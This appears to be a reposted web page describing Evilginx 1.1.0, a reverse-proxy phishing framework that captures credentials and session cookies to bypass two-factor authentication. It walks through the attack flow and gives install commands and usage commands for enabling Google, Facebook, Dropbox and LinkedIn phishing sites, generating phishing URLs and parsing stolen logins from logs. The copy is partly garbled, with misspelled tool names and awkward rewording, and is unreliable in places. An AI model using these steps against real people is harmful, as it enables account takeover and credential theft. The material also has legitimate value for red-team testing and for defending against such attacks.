Evilginx - Phishing Attack Framework with 2FA Bypass

1. About Evilnigx 1.1.0 - Phishing Attack Framework with Two-factor Authentication Bypass
2. Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.
3.  
4. You can learn how it works and how to install everything yourself on my blog:
5. * First post slightly outdated now: Evilginx - Advanced Phishing With Two-factor Authentication Bypass
6. * Evilginx 1.0 Update: Evilginx 1.0 Update - Up Your Game in 2FA Phishing
7. * Evilginx 1.1 Update: Evilginx 1.1 Update
8.  
9. How Evilngix 1.1.0 works?
10. 1, Attacker generates a phishing link pointing to his server running Evilginx: https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID
11.  
12. Parameters in the URL stand for:
13. rc = On successful sign-in, victim will be redirected to this link e.g. document hosted on Google Drive.
14. rt = This is the name of the session cookie which is set in the browser only after successful sign-in. If this cookie is detected, this will be an indication for Evilginx that sign-in was successful and the victim can be redirected to URL supplied by rc parameter.
15.  
16. 2, Victim receives attacker's phishing link via any available communication channel (email, messenger etc.).
17.  
18. 3, Victim clicks the link and is presented with Evilginx's proxied Google sign-in page.
19.  
20. 4, Victim enters his/her valid account credentials, progresses through two-factor authentication challenge (if enabled) and he/she is redirected to URL specified by rc parameter. At this point rd cookie is saved for notreallygoogle.com domain in victim's browser. From now on, if this cookie is present, he/she will be immediately redirected to rc URL, when phishing link is re-opened.
21.  
22. 5, Attacker now has victim's email and password, as well as session cookies that can be imported into attacker's browser in order to take full control of the logged in session, bypassing any two-factor authentication protections enabled on victim's account.
23. Let's take few steps back and try to define main obstacles in traditional phishing efforts.
24.  
25. First and major pain with phishing for credentials is Two-Factor Authentication. You can create the best looking template that yields you dozens of logins and passwords, but you will eventually get roadblocked when asked for verification token that arrived via SMS. Not only will it stop you from progressing further, but it will also tip off the account owner, when they receive login attempt alert.
26.  
27. Second issue with phishing templates is, they must allow to accept any login and password, as they have no means of confirming their validity. That will, at times, leave you with invalid credentials.
28.  
29. Third issue is having to create phishing templates. Kuba Gretzky don't know about you, but for him the process of copying site layout, stripping javascript, fixing CSS and writing my own replacements for stripped javascript code to make the login screen behave as the original, is extremely annoying. It feels bad to recreate something, which has already been done.
30.  
31. In past several months Kuba Gretzky has worked on his own ettercap-like HTTP proxy software written in C++, using Boost::Asio library for maximum efficiency. Kuba Gretzky implemented SSLstrip, DNS spoofing and HSTS bypass. This solution worked perfectly in Local Area Network, but he wondered if same ideas could be repurposed for remote phishing, without a need to use custom-made software.
32.  
33. Kuba Gretzky had a revelation when he read an excellent blog post by @i_bo0om. @i_bo0om used Nginx HTTP server's proxy_pass feature and sub_filter module to proxy the real Telegram login page to visitors, intercepting credentials and session cookies on-the-fly using Man-In-The-Middle attacks. This article made me realize that Nginx could be used as a proxy for external servers and it sparked the idea of Evilginx. The idea was perfect - simple and yet effective.
34.  
35. Allow Kuba Gretzky to talk a bit on Evilginx's research process, before him focus on installation and usage.
36.  
37. Disclaimer about Evilngix 1.1.0 - Phishing Attack Framework with Two-factor Authentication Bypass
38. I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender's responsibility to take such attacks into consideration, when setting up defenses, and find ways to protect against this phishing method. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.
39.  
40. Contributors Hall of Fame: @poweroftrue
41.  
42. Install and Run Evilnigx 1.1.0:
43. sudo su
44. git clone https://github.com/kgretzky/evilginx
45. cd evilnigx
46. bash install.sh
47. python evilnigx.py
48.  
49. Using Evilngix 1.1.0
50. Enable or disable site configurations for use with Nginx server, using supplied Evilginx templates from sites directory.
51. usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
52. (-l | --enable ENABLE | --disable DISABLE)
53.  
54. optional arguments:
55. -h, --help show this help message and exit
56. -d DOMAIN, --domain DOMAIN
57. Your phishing domain.
58. -y Answer all questions with 'Yes'.
59. -l, --list List available supported apps.
60. --enable ENABLE Enable following site by name.
61. --disable DISABLE Disable following site by name.
62.  
63. List available site configuration templates:
64. python evilginx.py setup -l
65.  
66. Listing available supported sites:
67.  
68. - dropbox (/root/evilginx/sites/dropbox/config)
69. subdomains: www
70. - google (/root/evilginx/sites/google/config)
71. subdomains: accounts, ssl
72. - facebook (/root/evilginx/sites/facebook/config)
73. subdomains: www, m
74. - linkedin (/root/evilginx/sites/linkedin/config)
75. subdomains: www
76.  
77. Enable google phishing site with preregistered phishing domain not-really-google.com:
78. python evilginx.py setup --enable google -d not-really-google.com
79.  
80. Disable facebook phishing site: python evilginx.py setup --disable facebook
81.  
82. Parse
83. Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in logs directory, where evilginx.py script resides. This can be done automatically after you enable auto-parsing in the Setup phase.
84. usage: evilginx.py parse [-h] -s SITE [--debug]
85.  
86. optional arguments:
87. -h, --help show this help message and exit
88. -s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
89. for all sites).
90. --debug Does not truncate log file after parsing.
91.  
92. Parse logs only for google site: python evilginx.py parse -s google
93. Parse logs for all available sites: python evilginx.py parse -s all
94.  
95. Generate URL
96. Generate phishing URLs that you can use in your Red Team Assessments.
97. usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
98.  
99. optional arguments:
100. -h, --help show this help message and exit
101. -s SITE, --site SITE Name of site to generate link for.
102. -r REDIRECT, --redirect REDIRECT
103. Redirect user to this URL after successful sign-in.
104.  
105. Generate google phishing URL that will redirect victim to rick'roll video on successful login:
106. python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
107.  
108. Generated following phishing URLs:
109.  
110. : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
111. : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
112.  
113. Video demo of Evilginx 1.1.0 - Phishing Attack Framework with 2FA Bypass: https://vimeo.com/212463675
114.  
115. Download Evilngix 1.1.0: https://github.com/kgretzky/evilginx